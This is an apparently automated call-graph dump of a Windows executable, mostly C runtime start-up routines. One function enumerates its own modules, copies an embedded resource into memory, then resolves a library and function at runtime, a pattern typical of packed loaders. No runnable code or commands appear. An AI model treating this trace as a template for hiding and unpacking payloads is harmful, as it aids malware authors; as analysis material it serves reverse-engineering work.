calls 15302->15303 15304 40c951 15303->15304 15304->15042 14351 40aedb 14356 40aecb 14351->14356 14354 40aef4 14355 40aec0 moneypunct 64 API calls 14355->14354 14359 40cfdc 14356->14359 14358 40aed9 14358->14354 14358->14355 14360 40cfe8 __fcloseall 14359->14360 14361 40d6e0 __lock 63 API calls 14360->14361 14366 40cfef 14361->14366 14362 40d028 14369 40d043 14362->14369 14364 40d039 __fcloseall 14364->14358 14365 40d01f 14367 40b6b5 __output_l 63 API calls 14365->14367 14366->14362 14366->14365 14368 40b6b5 __output_l 63 API calls 14366->14368 14367->14362 14368->14365 14372 40d606 LeaveCriticalSection 14369->14372 14371 40d04a 14371->14364 14372->14371 12173 40cbdd 12174 40cbe9 __fcloseall 12173->12174 12208 40d534 HeapCreate 12174->12208 12177 40cc46 12210 41087e GetModuleHandleW 12177->12210 12181 40cc57 __RTC_Initialize 12244 411a15 12181->12244 12182 40cbb4 _fast_error_exit 63 API calls 12182->12181 12184 40cc66 12185 40cc72 GetCommandLineA 12184->12185 12384 40e79a 12184->12384 12259 412892 12185->12259 12192 40cc97 12298 41255f 12192->12298 12193 40e79a __amsg_exit 63 API calls 12193->12192 12196 40cca8 12313 40e859 12196->12313 12197 40e79a __amsg_exit 63 API calls 12197->12196 12199 40ccb0 12200 40ccbb 12199->12200 12201 40e79a __amsg_exit 63 API calls 12199->12201 12319 4019f0 OleInitialize 12200->12319 12201->12200 12203 40ccd8 12204 40ccea 12203->12204 12373 40ea0a 12203->12373 12391 40ea36 12204->12391 12207 40ccef __fcloseall 12209 40cc3a 12208->12209 12209->12177 12376 40cbb4 12209->12376 12211 410892 12210->12211 12212 410899 12210->12212 12394 40e76a 12211->12394 12214 410a01 12212->12214 12215 4108a3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 12212->12215 12453 410598 12214->12453 12217 4108ec TlsAlloc 12215->12217 12219 40cc4c 12217->12219 12221 41093a TlsSetValue 12217->12221 12219->12181 12219->12182 12221->12219 12222 41094b 12221->12222 12398 40ea54 12222->12398 12227 41046e __encode_pointer 6 API calls 12228 41096b 12227->12228 12229 41046e __encode_pointer 6 API calls 12228->12229 12230 41097b 12229->12230 12231 41046e __encode_pointer 6 API calls 12230->12231 12232 41098b 12231->12232 12415 40d564 12232->12415 12239 4104e9 __decode_pointer 6 API calls 12240 4109df 12239->12240 12240->12214 12241 4109e6 12240->12241 12435 4105d5 12241->12435 12243 4109ee GetCurrentThreadId 12243->12219 12759 40e1d8 12244->12759 12246 411a21 GetStartupInfoA 12247 411cba __calloc_crt 63 API calls 12246->12247 12253 411a42 12247->12253 12248 411c60 __fcloseall 12248->12184 12249 411bdd GetStdHandle 12258 411ba7 12249->12258 12250 411cba __calloc_crt 63 API calls 12250->12253 12251 411c42 SetHandleCount 12251->12248 12252 411bef GetFileType 12252->12258 12253->12248 12253->12250 12255 411b2a 12253->12255 12253->12258 12254 411b53 GetFileType 12254->12255 12255->12248 12255->12254 12257 41389c __ioinit InitializeCriticalSectionAndSpinCount 12255->12257 12255->12258 12256 41389c __ioinit InitializeCriticalSectionAndSpinCount 12256->12258 12257->12255 12258->12248 12258->12249 12258->12251 12258->12252 12258->12256 12260 4128b0 GetEnvironmentStringsW 12259->12260 12263 4128cf 12259->12263 12261 4128c4 GetLastError 12260->12261 12262 4128b8 12260->12262 12261->12263 12264 4128eb GetEnvironmentStringsW 12262->12264 12265 4128fa WideCharToMultiByte 12262->12265 12263->12262 12267 412968 12263->12267 12264->12265 12268 40cc82 12264->12268 12271 41295d FreeEnvironmentStringsW 12265->12271 12272 41292e 12265->12272 12266 412971 GetEnvironmentStrings 12266->12268 12269 412981 12266->12269 12267->12266 12267->12268 12285 4127d7 12268->12285 12274 411c75 __malloc_crt 63 API calls 12269->12274 12271->12268 12275 411c75 __malloc_crt 63 API calls 12272->12275 12276 41299b 12274->12276 12277 412934 12275->12277 12278 4129a2 FreeEnvironmentStringsA 12276->12278 12279 4129ae _realloc 12276->12279 12277->12271 12280 41293c WideCharToMultiByte 12277->12280 12278->12268 12283 4129b8 FreeEnvironmentStringsA 12279->12283 12281 412956 12280->12281 12282 41294e 12280->12282 12281->12271 12284 40b6b5 __output_l 63 API calls 12282->12284 12283->12268 12284->12281 12286 4127f1 GetModuleFileNameA 12285->12286 12287 4127ec 12285->12287 12289 412818 12286->12289 12766 41446b 12287->12766 12760 41263d 12289->12760 12292 40cc8c 12292->12192 12292->12193 12293 412854 12294 411c75 __malloc_crt 63 API calls 12293->12294 12295 41285a 12294->12295 12295->12292 12296 41263d _parse_cmdline 73 API calls 12295->12296 12297 412874 12296->12297 12297->12292 12299 412568 12298->12299 12301 41256d _strlen 12298->12301 12300 41446b ___initmbctable 107 API calls 12299->12300 12300->12301 12302 411cba __calloc_crt 63 API calls 12301->12302 12305 40cc9d 12301->12305 12308 4125a2 _strlen 12302->12308 12303 412600 12304 40b6b5 __output_l 63 API calls 12303->12304 12304->12305 12305->12196 12305->12197 12306 411cba __calloc_crt 63 API calls 12306->12308 12307 412626 12310 40b6b5 __output_l 63 API calls 12307->12310 12308->12303 12308->12305 12308->12306 12308->12307 12309 40ef42 _strcpy_s 63 API calls 12308->12309 12312 4125e7 12308->12312 12309->12308 12310->12305 12311 40e61c __invoke_watson 10 API calls 12311->12312 12312->12308 12312->12311 12314 40e867 __IsNonwritableInCurrentImage 12313->12314 13177 413586 12314->13177 12316 40e885 __initterm_e 12318 40e8a4 __IsNonwritableInCurrentImage __initterm 12316->12318 13181 40d2bd 12316->13181 12318->12199 12320 401ab9 12319->12320 13281 40b99e 12320->13281 12322 401abf 12323 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 12322->12323 12349 402467 12322->12349 12324 401dc3 CloseHandle GetModuleHandleA 12323->12324 12325 401c55 12323->12325 13294 401650 12324->13294 12331 401c9c CloseHandle 12325->12331 12336 401cf9 Module32Next 12325->12336 12327 401e8b FindResourceA LoadResource LockResource SizeofResource 12328 40b84d _malloc 63 API calls 12327->12328 12329 401ebf 12328->12329 13296 40af66 12329->13296 12331->12203 12332 401ecb _memset 12333 401efc SizeofResource 12332->12333 12334 401f1c 12333->12334 12335 401f5f 12333->12335 12334->12335 13334 401560 12334->13334 12338 401f92 _memset 12335->12338 12339 401560 __VEC_memcpy 12335->12339 12336->12324 12345 401d0f 12336->12345 12340 401fa2 FreeResource 12338->12340 12339->12338 12341 40b84d _malloc 63 API calls 12340->12341 12342 401fbb SizeofResource 12341->12342 12343 401fe5 _memset 12342->12343 12344 4020aa LoadLibraryA 12343->12344 12346 401650 12344->12346 12345->12331 12348 401dad Module32Next 12345->12348 12347 40216c GetProcAddress 12346->12347 12347->12349 12350 4021aa 12347->12350 12348->12324 12348->12345 12349->12203 12350->12349 13308 4018f0 12350->13308 12352 40243f 12352->12349 12353 40b6b5 __output_l 63 API calls 12352->12353 12353->12349 12354 4021f1 12354->12352 13320 401870 12354->13320 12356 402269 #8 12357 401870 76 API calls 12356->12357 12358 40228b #8 12357->12358 12359 4022a7 12358->12359 12360 4022d9 #15 #23 12359->12360 13325 40b350 12360->13325 12363 40232c 12364 402354 #16 12363->12364 12365 40235b 12363->12365 12364->12365 12366 402392 #411 12365->12366 12367 4023a4 12366->12367 12368 4023bc #9 #9 12367->12368 13327 4019a0 12368->13327 12371 40242e 12372 4019a0 66 API calls 12371->12372 12372->12352 13599 40e8de 12373->13599 12375 40ea1b 12375->12204 12377 40cbc2 12376->12377 12378 40cbc7 12376->12378 12379 40ec4d __FF_MSGBANNER 63 API calls 12377->12379 12380 40eaa2 __NMSG_WRITE 63 API calls 12378->12380 12379->12378 12381 40cbcf 12380->12381 12382 40e7ee _doexit 4 API calls 12381->12382 12383 40cbd9 12382->12383 12383->12177 12385 40ec4d __FF_MSGBANNER 63 API calls 12384->12385 12386 40e7a4 12385->12386 12387 40eaa2 __NMSG_WRITE 63 API calls 12386->12387 12388 40e7ac 12387->12388 12389 4104e9 __decode_pointer 6 API calls 12388->12389 12390 40cc71 12389->12390 12390->12185 12392 40e8de _doexit 63 API calls 12391->12392 12393 40ea41 12392->12393 12393->12207 12395 40e775 Sleep GetModuleHandleW 12394->12395 12396 40e793 12395->12396 12397 40e797 12395->12397 12396->12395 12396->12397 12397->12212 12459 4104e0 12398->12459 12400 40ea5c __init_pointers __initp_misc_winsig 12462 41393d 12400->12462 12403 41046e __encode_pointer 6 API calls 12404 40ea98 12403->12404 12405 41046e TlsGetValue 12404->12405 12406 4104a7 GetModuleHandleW 12405->12406 12407 410486 12405->12407 12409 4104c2 GetProcAddress 12406->12409 12410 4104b7 12406->12410 12407->12406 12408 410490 TlsGetValue 12407->12408 12412 41049b 12408->12412 12414 41049f 12409->12414 12411 40e76a __crt_waiting_on_module_handle 2 API calls 12410->12411 12413 4104bd 12411->12413 12412->12406 12412->12414 12413->12409 12413->12414 12414->12227 12416 40d56f 12415->12416 12418 40d59d 12416->12418 12465 41389c 12416->12465 12418->12214 12419 4104e9 TlsGetValue 12418->12419 12420 410501 12419->12420 12421 410522 GetModuleHandleW 12419->12421 12420->12421 12422 41050b TlsGetValue 12420->12422 12423 410532 12421->12423 12424 41053d GetProcAddress 12421->12424 12426 410516 12422->12426 12425 40e76a __crt_waiting_on_module_handle 2 API calls 12423->12425 12428 41051a 12424->12428 12427 410538 12425->12427 12426->12421 12426->12428 12427->12424 12427->12428 12428->12214 12429 411cba 12428->12429 12432 411cc3 12429->12432 12431 4109c5 12431->12214 12431->12239 12432->12431 12433 411ce1 Sleep 12432->12433 12470 40e231 12432->12470 12434 411cf6 12433->12434 12434->12431 12434->12432 12738 40e1d8 12435->12738 12437 4105e1 GetModuleHandleW 12438 4105f1 12437->12438 12442 4105f7 12437->12442 12439 40e76a __crt_waiting_on_module_handle 2 API calls 12438->12439 12439->12442 12440 410633 12443 40d6e0 __lock 59 API calls 12440->12443 12441 41060f GetProcAddress GetProcAddress 12441->12440 12442->12440 12442->12441 12444 410652 InterlockedIncrement 12443->12444 12739 4106aa 12444->12739 12447 40d6e0 __lock 59 API calls 12448 410673 12447->12448 12742 4145d2 InterlockedIncrement 12448->12742 12450 410691 12754 4106b3 12450->12754 12452 41069e __fcloseall 12452->12243 12454 4105a2 12453->12454 12455 4105ae 12453->12455 12458 4104e9 __decode_pointer 6 API calls 12454->12458 12456 4105d0 12455->12456 12457 4105c2 TlsFree 12455->12457 12456->12456 12457->12456 12458->12455 12460 41046e __encode_pointer 6 API calls 12459->12460 12461 4104e7 12460->12461 12461->12400 12463 41046e __encode_pointer 6 API calls 12462->12463 12464 40ea8e 12463->12464 12464->12403 12469 40e1d8 12465->12469 12467 4138a8 InitializeCriticalSectionAndSpinCount 12468 4138ec __fcloseall 12467->12468 12468->12416 12469->12467 12471 40e23d __fcloseall 12470->12471 12472 40e255 12471->12472 12482 40e274 _memset 12471->12482 12483 40bfc1 12472->12483 12475 40e2e6 HeapAlloc 12475->12482 12479 40e26a __fcloseall 12479->12432 12482->12475 12482->12479 12489 40d6e0 12482->12489 12496 40def2 12482->12496 12502 40e32d 12482->12502 12505 40d2e3 12482->12505 12508 4106bc GetLastError 12483->12508 12485 40bfc6 12486 40e744 12485->12486 12487 4104e9 __decode_pointer 6 API calls 12486->12487 12488 40e754 __invoke_watson 12487->12488 12490 40d6f5 12489->12490 12491 40d708 EnterCriticalSection 12489->12491 12533 40d61d 12490->12533 12491->12482 12493 40d6fb 12493->12491 12494 40e79a __amsg_exit 62 API calls 12493->12494 12495 40d707 12494->12495 12495->12491 12497 40df20 12496->12497 12498 40dfc2 12497->12498 12501 40dfb9 12497->12501 12726 40da59 12497->12726 12498->12482 12501->12498 12733 40db09 12501->12733 12737 40d606 LeaveCriticalSection 12502->12737 12504 40e334 12504->12482 12506 4104e9 __decode_pointer 6 API calls 12505->12506 12507 40d2f3 12506->12507 12507->12482 12522 410564 TlsGetValue 12508->12522 12511 410729 SetLastError 12511->12485 12512 411cba __calloc_crt 60 API calls 12513 4106e7 12512->12513 12513->12511 12514 4104e9 __decode_pointer 6 API calls 12513->12514 12515 410701 12514->12515 12516 410720 12515->12516 12517 410708 12515->12517 12527 40b6b5 12516->12527 12518 4105d5 __initptd 60 API calls 12517->12518 12520 410710 GetCurrentThreadId 12518->12520 12520->12511 12521 410726 12521->12511 12523 410594 12522->12523 12524 410579 12522->12524 12523->12511 12523->12512 12525 4104e9 __decode_pointer 6 API calls 12524->12525 12526 410584 TlsSetValue 12525->12526 12526->12523 12528 40b6c1 __fcloseall 12527->12528 12529 40b714 HeapFree 12528->12529 12531 40b73d __fcloseall 12528->12531 12530 40b727 12529->12530 12529->12531 12532 40bfc1 __output_l 62 API calls 12530->12532 12531->12521 12532->12531 12534 40d629 __fcloseall 12533->12534 12535 40d64f 12534->12535 12559 40ec4d 12534->12559 12544 40d65f __fcloseall 12535->12544 12605 411c75 12535->12605 12542 40d680 12547 40d6e0 __lock 63 API calls 12542->12547 12543 40d671 12546 40bfc1 __output_l 63 API calls 12543->12546 12544->12493 12546->12544 12548 40d687 12547->12548 12549 40d6bb 12548->12549 12550 40d68f 12548->12550 12551 40b6b5 __output_l 63 API calls 12549->12551 12552 41389c __ioinit InitializeCriticalSectionAndSpinCount 12550->12552 12558 40d6ac 12551->12558 12553 40d69a 12552->12553 12554 40b6b5 __output_l 63 API calls 12553->12554 12553->12558 12556 40d6a6 12554->12556 12557 40bfc1 __output_l 63 API calls 12556->12557 12557->12558 12610 40d6d7 12558->12610 12613 413d5b 12559->12613 12562 40ec61 12564 40eaa2 __NMSG_WRITE 63 API calls 12562->12564 12566 40d63e 12562->12566 12563 413d5b __set_error_mode 63 API calls 12563->12562 12565 40ec79 12564->12565 12567 40eaa2 __NMSG_WRITE 63 API calls 12565->12567 12568 40eaa2 12566->12568 12567->12566 12569 40eab6 12568->12569 12570 413d5b __set_error_mode 60 API calls 12569->12570 12601 40d645 12569->12601 12571 40ead8 12570->12571 12572 40ec16 GetStdHandle 12571->12572 12573 413d5b __set_error_mode 60 API calls 12571->12573 12574 40ec24 _strlen 12572->12574 12572->12601 12576 40eae9 12573->12576 12577 40ec3d WriteFile 12574->12577 12574->12601 12575 40eafb 12575->12601 12619 40ef42 12575->12619 12576->12572 12576->12575 12577->12601 12580 40eb31 GetModuleFileNameA 12582 40eb4f 12580->12582 12586 40eb72 _strlen 12580->12586 12584 40ef42 _strcpy_s 60 API calls 12582->12584 12585 40eb5f 12584->12585 12585->12586 12588 40e61c __invoke_watson 10 API calls 12585->12588 12587 40ebb5 12586->12587 12635 411da6 12586->12635 12644 413ce7 12587->12644 12588->12586 12592 40ebd9 12595 413ce7 _strcat_s 60 API calls 12592->12595 12594 40e61c __invoke_watson 10 API calls 12594->12592 12596 40ebed 12595->12596 12598 40ebfe 12596->12598 12599 40e61c __invoke_watson 10 API calls 12596->12599 12597 40e61c __invoke_watson 10 API calls 12597->12587 12653 413b7e 12598->12653 12599->12598 12602 40e7ee 12601->12602 12691 40e7c3 GetModuleHandleW 12602->12691 12608 411c7e 12605->12608 12607 40d66a 12607->12542 12607->12543 12608->12607 12609 411c95 Sleep 12608->12609 12695 40b84d 12608->12695 12609->12608 12725 40d606 LeaveCriticalSection 12610->12725 12612 40d6de 12612->12544 12616 413d6a 12613->12616 12614 40bfc1 __output_l 63 API calls 12617 413d8d 12614->12617 12615 40ec54 12615->12562 12615->12563 12616->12614 12616->12615 12618 40e744 __output_l 6 API calls 12617->12618 12618->12615 12620 40ef53 12619->12620 12621 40ef5a 12619->12621 12620->12621 12626 40ef80 12620->12626 12622 40bfc1 __output_l 63 API calls 12621->12622 12623 40ef5f 12622->12623 12624 40e744 __output_l 6 API calls 12623->12624 12625 40eb1d 12624->12625 12625->12580 12628 40e61c 12625->12628 12626->12625 12627 40bfc1 __output_l 63 API calls 12626->12627 12627->12623 12680 40ba30 12628->12680 12630 40e649 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12631 40e725 GetCurrentProcess TerminateProcess 12630->12631 12632 40e719 __invoke_watson 12630->12632 12682 40ce09 12631->12682 12632->12631 12634 40e742 12634->12580 12636 411db8 12635->12636 12637 411dbc 12636->12637 12638 40eba2 12636->12638 12642 411e02 12636->12642 12637->12638 12639 40bfc1 __output_l 63 API calls 12637->12639 12638->12587 12638->12597 12640 411dd8 12639->12640 12641 40e744 __output_l 6 API calls 12640->12641 12641->12638 12642->12638 12643 40bfc1 __output_l 63 API calls 12642->12643 12643->12640 12645 413cff 12644->12645 12648 413cf8 12644->12648 12646 40bfc1 __output_l 63 API calls 12645->12646 12647 413d04 12646->12647 12649 40e744 __output_l 6 API calls 12647->12649 12648->12645 12651 413d33 12648->12651 12650 40ebc8 12649->12650 12650->12592 12650->12594 12651->12650 12652 40bfc1 __output_l 63 API calls 12651->12652 12652->12647 12654 4104e0 _doexit 6 API calls 12653->12654 12655 413b8e 12654->12655 12656 413ba1 LoadLibraryA 12655->12656 12660 413c29 12655->12660 12658 413ccb 12656->12658 12659 413bb6 GetProcAddress 12656->12659 12657 413c53 12663 4104e9 __decode_pointer 6 API calls 12657->12663 12678 413c7e 12657->12678 12658->12601 12659->12658 12661 413bcc 12659->12661 12660->12657 12664 4104e9 __decode_pointer 6 API calls 12660->12664 12665 41046e __encode_pointer 6 API calls 12661->12665 12662 4104e9 __decode_pointer 6 API calls 12662->12658 12674 413c96 12663->12674 12666 413c46 12664->12666 12667 413bd2 GetProcAddress 12665->12667 12668 4104e9 __decode_pointer 6 API calls 12666->12668 12669 41046e __encode_pointer 6 API calls 12667->12669 12668->12657 12670 413be7 GetProcAddress 12669->12670 12671 41046e __encode_pointer 6 API calls 12670->12671 12672 413bfc GetProcAddress 12671->12672 12673 41046e __encode_pointer 6 API calls 12672->12673 12676 413c11 12673->12676 12675 4104e9 __decode_pointer 6 API calls 12674->12675 12674->12678 12675->12678 12676->12660 12677 413c1b GetProcAddress 12676->12677 12679 41046e __encode_pointer 6 API calls 12677->12679 12678->12662 12679->12660 12681 40ba3c __VEC_memzero 12680->12681 12681->12630 12683 40ce11 12682->12683 12684 40ce13 IsDebuggerPresent 12682->12684 12683->12634 12690 4138fc 12684->12690 12687 413706 SetUnhandledExceptionFilter UnhandledExceptionFilter 12688 413723 __invoke_watson 12687->12688 12689 41372b GetCurrentProcess TerminateProcess 12687->12689 12688->12689 12689->12634 12690->12687 12692 40e7d7 GetProcAddress 12691->12692 12693 40e7ec ExitProcess 12691->12693 12692->12693 12694 40e7e7 CorExitProcess 12692->12694 12694->12693 12696 40b900 12695->12696 12707 40b85f 12695->12707 12697 40d2e3 _realloc 6 API calls 12696->12697 12698 40b906 12697->12698 12700 40bfc1 __output_l 62 API calls 12698->12700 12699 40ec4d __FF_MSGBANNER 62 API calls 12705 40b870 12699->12705 12701 40b8f8 12700->12701 12701->12608 12702 40eaa2 __NMSG_WRITE 62 API calls 12702->12705 12704 40b8bc RtlAllocateHeap 12704->12707 12705->12699 12705->12702 12706 40e7ee _doexit 4 API calls 12705->12706 12705->12707 12706->12705 12707->12701 12707->12704 12707->12705 12708 40b8ec 12707->12708 12709 40d2e3 _realloc 6 API calls 12707->12709 12711 40b8f1 12707->12711 12713 40b7fe 12707->12713 12710 40bfc1 __output_l 62 API calls 12708->12710 12709->12707 12710->12711 12712 40bfc1 __output_l 62 API calls 12711->12712 12712->12701 12714 40b80a __fcloseall 12713->12714 12715 40d6e0 __lock 63 API calls 12714->12715 12717 40b83b __fcloseall 12714->12717 12716 40b820 12715->12716 12718 40def2 ___sbh_alloc_block 5 API calls 12716->12718 12717->12707 12719 40b82b 12718->12719 12721 40b844 12719->12721 12724 40d606 LeaveCriticalSection 12721->12724 12723 40b84b 12723->12717 12724->12723 12725->12612 12727 40daa0 HeapAlloc 12726->12727 12728 40da6c HeapReAlloc 12726->12728 12730 40dac3 VirtualAlloc 12727->12730 12731 40da8a 12727->12731 12729 40da8e 12728->12729 12728->12731 12729->12727 12730->12731 12732 40dadd HeapFree 12730->12732 12731->12501 12732->12731 12734 40db20 VirtualAlloc 12733->12734 12736 40db67 12734->12736 12736->12498 12737->12504 12738->12437 12757 40d606 LeaveCriticalSection 12739->12757 12741 41066c 12741->12447 12743 4145f0 InterlockedIncrement 12742->12743 12744 4145f3 12742->12744 12743->12744 12745 414600 12744->12745 12746 4145fd InterlockedIncrement 12744->12746 12747 41460a InterlockedIncrement 12745->12747 12748 41460d 12745->12748 12746->12745 12747->12748 12749 414617 InterlockedIncrement 12748->12749 12751 41461a 12748->12751 12749->12751 12750 414633 InterlockedIncrement 12750->12751 12751->12750 12752 414643 InterlockedIncrement 12751->12752 12753 41464e InterlockedIncrement 12751->12753 12752->12751 12753->12450 12758 40d606 LeaveCriticalSection 12754->12758 12756 4106ba 12756->12452 12757->12741 12758->12756 12759->12246 12762 41265c 12760->12762 12764 4126c9 12762->12764 12770 416836 12762->12770 12763 4127c7 12763->12292 12763->12293 12764->12763 12765 416836 73 API calls _parse_cmdline 12764->12765 12765->12764 12767 414474 12766->12767 12768 41447b 12766->12768 12992 4142d1 12767->12992 12768->12286 12773 4167e3 12770->12773 12776 40ec86 12773->12776 12777 40ec99 12776->12777 12783 40ece6 12776->12783 12784 410735 12777->12784 12780 40ecc6 12780->12783 12804 413fcc 12780->12804 12783->12762 12785 4106bc __getptd_noexit 63 API calls 12784->12785 12786 41073d 12785->12786 12787 40ec9e 12786->12787 12788 40e79a __amsg_exit 63 API calls 12786->12788 12787->12780 12789 414738 12787->12789 12788->12787 12790 414744 __fcloseall 12789->12790 12791 410735 __getptd 63 API calls 12790->12791 12792 414749 12791->12792 12793 414777 12792->12793 12794 41475b 12792->12794 12795 40d6e0 __lock 63 API calls 12793->12795 12796 410735 __getptd 63 API calls 12794->12796 12797 41477e 12795->12797 12798 414760 12796->12798 12820 4146fa 12797->12820 12801 41476e __fcloseall 12798->12801 12803 40e79a __amsg_exit 63 API calls 12798->12803 12801->12780 12803->12801 12805 413fd8 __fcloseall 12804->12805 12806 410735 __getptd 63 API calls 12805->12806 12807 413fdd 12806->12807 12808 40d6e0 __lock 63 API calls 12807->12808 12809 413fef 12807->12809 12811 41400d 12808->12811 12810 413ffd __fcloseall 12809->12810 12813 40e79a __amsg_exit 63 API calls 12809->12813 12810->12783 12812 414056 12811->12812 12815 414024 InterlockedDecrement 12811->12815 12816 41403e InterlockedIncrement 12811->12816 12988 414067 12812->12988 12813->12810 12815->12816 12817 41402f 12815->12817 12816->12812 12817->12816 12818 40b6b5 __output_l 63 API calls 12817->12818 12819 41403d 12818->12819 12819->12816 12821 4146fe 12820->12821 12822 414730 12820->12822 12821->12822 12823 4145d2 ___addlocaleref 8 API calls 12821->12823 12828 4147a2 12822->12828 12824 414711 12823->12824 12824->12822 12831 414661 12824->12831 12987 40d606 LeaveCriticalSection 12828->12987 12830 4147a9 12830->12798 12832 414672 InterlockedDecrement 12831->12832 12833 4146f5 12831->12833 12834 414687 InterlockedDecrement 12832->12834 12835 41468a 12832->12835 12833->12822 12845 414489 12833->12845 12834->12835 12836 414694 InterlockedDecrement 12835->12836 12837 414697 12835->12837 12836->12837 12838 4146a1 InterlockedDecrement 12837->12838 12839 4146a4 12837->12839 12838->12839 12840 4146ae InterlockedDecrement 12839->12840 12841 4146b1 12839->12841 12840->12841 12842 4146ca InterlockedDecrement 12841->12842 12843 4146da InterlockedDecrement 12841->12843 12844 4146e5 InterlockedDecrement 12841->12844 12842->12841 12843->12841 12844->12833 12846 41450d 12845->12846 12850 4144a0 12845->12850 12848 40b6b5 __output_l 63 API calls 12846->12848 12849 41455a 12846->12849 12847 414581 12858 4145c6 12847->12858 12864 40b6b5 63 API calls __output_l 12847->12864 12851 41452e 12848->12851 12849->12847 12899 417667 12849->12899 12850->12846 12856 4144d4 12850->12856 12860 40b6b5 __output_l 63 API calls 12850->12860 12853 40b6b5 __output_l 63 API calls 12851->12853 12855 414541 12853->12855 12863 40b6b5 __output_l 63 API calls 12855->12863 12865 40b6b5 __output_l 63 API calls 12856->12865 12874 4144f5 12856->12874 12857 40b6b5 __output_l 63 API calls 12866 414502 12857->12866 12861 40b6b5 __output_l 63 API calls 12858->12861 12859 40b6b5 __output_l 63 API calls 12859->12847 12862 4144c9 12860->12862 12867 4145cc 12861->12867 12875 417841 12862->12875 12869 41454f 12863->12869 12864->12847 12870 4144ea 12865->12870 12871 40b6b5 __output_l 63 API calls 12866->12871 12867->12822 12872 40b6b5 __output_l 63 API calls 12869->12872 12891 4177fc 12870->12891 12871->12846 12872->12849 12874->12857 12876 4178cb 12875->12876 12877 41784e 12875->12877 12876->12856 12878 41785f 12877->12878 12879 40b6b5 __output_l 63 API calls 12877->12879 12880 417871 12878->12880 12881 40b6b5 __output_l 63 API calls 12878->12881 12879->12878 12882 417883 12880->12882 12883 40b6b5 __output_l 63 API calls 12880->12883 12881->12880 12884 417895 12882->12884 12886 40b6b5 __output_l 63 API calls 12882->12886 12883->12882 12885 4178a7 12884->12885 12887 40b6b5 __output_l 63 API calls 12884->12887 12888 4178b9 12885->12888 12889 40b6b5 __output_l 63 API calls 12885->12889 12886->12884 12887->12885 12888->12876 12890 40b6b5 __output_l 63 API calls 12888->12890 12889->12888 12890->12876 12892 417809 12891->12892 12898 41783d 12891->12898 12893 40b6b5 __output_l 63 API calls 12892->12893 12895 417819 12892->12895 12893->12895 12894 41782b 12897 40b6b5 __output_l 63 API calls 12894->12897 12894->12898 12895->12894 12896 40b6b5 __output_l 63 API calls 12895->12896 12896->12894 12897->12898 12898->12874 12900 417678 12899->12900 12986 41457a 12899->12986 12901 40b6b5 __output_l 63 API calls 12900->12901 12902 417680 12901->12902 12903 40b6b5 __output_l 63 API calls 12902->12903 12904 417688 12903->12904 12905 40b6b5 __output_l 63 API calls 12904->12905 12906 417690 12905->12906 12907 40b6b5 __output_l 63 API calls 12906->12907 12908 417698 12907->12908 12909 40b6b5 __output_l 63 API calls 12908->12909 12910 4176a0 12909->12910 12911 40b6b5 __output_l 63 API calls 12910->12911 12912 4176a8 12911->12912 12913 40b6b5 __output_l 63 API calls 12912->12913 12914 4176af 12913->12914 12915 40b6b5 __output_l 63 API calls 12914->12915 12916 4176b7 12915->12916 12917 40b6b5 __output_l 63 API calls 12916->12917 12918 4176bf 12917->12918 12919 40b6b5 __output_l 63 API calls 12918->12919 12920 4176c7 12919->12920 12921 40b6b5 __output_l 63 API calls 12920->12921 12922 4176cf 12921->12922 12923 40b6b5 __output_l 63 API calls 12922->12923 12924 4176d7 12923->12924 12925 40b6b5 __output_l 63 API calls 12924->12925 12926 4176df 12925->12926 12927 40b6b5 __output_l 63 API calls 12926->12927 12928 4176e7 12927->12928 12929 40b6b5 __output_l 63 API calls 12928->12929 12930 4176ef 12929->12930 12931 40b6b5 __output_l 63 API calls 12930->12931 12932 4176f7 12931->12932 12933 40b6b5 __output_l 63 API calls 12932->12933 12934 417702 12933->12934 12935 40b6b5 __output_l 63 API calls 12934->12935 12936 41770a 12935->12936 12937 40b6b5 __output_l 63 API calls 12936->12937 12938 417712 12937->12938 12939 40b6b5 __output_l 63 API calls 12938->12939 12940 41771a 12939->12940 12941 40b6b5 __output_l 63 API calls 12940->12941 12942 417722 12941->12942 12943 40b6b5 __output_l 63 API calls 12942->12943 12944 41772a 12943->12944 12945 40b6b5 __output_l 63 API calls 12944->12945 12946 417732 12945->12946 12947 40b6b5 __output_l 63 API calls 12946->12947 12948 41773a 12947->12948 12949 40b6b5 __output_l 63 API calls 12948->12949 12950 417742 12949->12950 12951 40b6b5 __output_l 63 API calls 12950->12951 12952 41774a 12951->12952 12953 40b6b5 __output_l 63 API calls 12952->12953 12954 417752 12953->12954 12955 40b6b5 __output_l 63 API calls 12954->12955 12956 41775a 12955->12956 12957 40b6b5 __output_l 63 API calls 12956->12957 12958 417762 12957->12958 12959 40b6b5 __output_l 63 API calls 12958->12959 12960 41776a 12959->12960 12961 40b6b5 __output_l 63 API calls 12960->12961 12962 417772 12961->12962 12963 40b6b5 __output_l 63 API calls 12962->12963 12964 41777a 12963->12964 12965 40b6b5 __output_l 63 API calls 12964->12965 12966 417788 12965->12966 12967 40b6b5 __output_l 63 API calls 12966->12967 12968 417793 12967->12968 12969 40b6b5 __output_l 63 API calls 12968->12969 12970 41779e 12969->12970 12971 40b6b5 __output_l 63 API calls 12970->12971 12972 4177a9 12971->12972 12973 40b6b5 __output_l 63 API calls 12972->12973 12974 4177b4 12973->12974 12975 40b6b5 __output_l 63 API calls 12974->12975 12976 4177bf 12975->12976 12977 40b6b5 __output_l 63 API calls 12976->12977 12978 4177ca 12977->12978 12979 40b6b5 __output_l 63 API calls 12978->12979 12980 4177d5 12979->12980 12981 40b6b5 __output_l 63 API calls 12980->12981 12982 4177e0 12981->12982 12983 40b6b5 __output_l 63 API calls 12982->12983 12984 4177eb 12983->12984 12985 40b6b5 __output_l 63 API calls 12984->12985 12985->12986 12986->12859 12987->12830 12991 40d606 LeaveCriticalSection 12988->12991 12990 41406e 12990->12809 12991->12990 12993 4142dd __fcloseall 12992->12993 12994 410735 __getptd 63 API calls 12993->12994 12995 4142e6 12994->12995 12996 413fcc __setmbcp 65 API calls 12995->12996 12997 4142f0 12996->12997 13023 414070 12997->13023 13000 411c75 __malloc_crt 63 API calls 13001 414311 13000->13001 13002 414430 __fcloseall 13001->13002 13030 4140ec 13001->13030 13002->12768 13005 414341 InterlockedDecrement 13007 414351 13005->13007 13008 414362 InterlockedIncrement 13005->13008 13006 41443d 13006->13002 13010 414450 13006->13010 13011 40b6b5 __output_l 63 API calls 13006->13011 13007->13008 13013 40b6b5 __output_l 63 API calls 13007->13013 13008->13002 13009 414378 13008->13009 13009->13002 13014 40d6e0 __lock 63 API calls 13009->13014 13012 40bfc1 __output_l 63 API calls 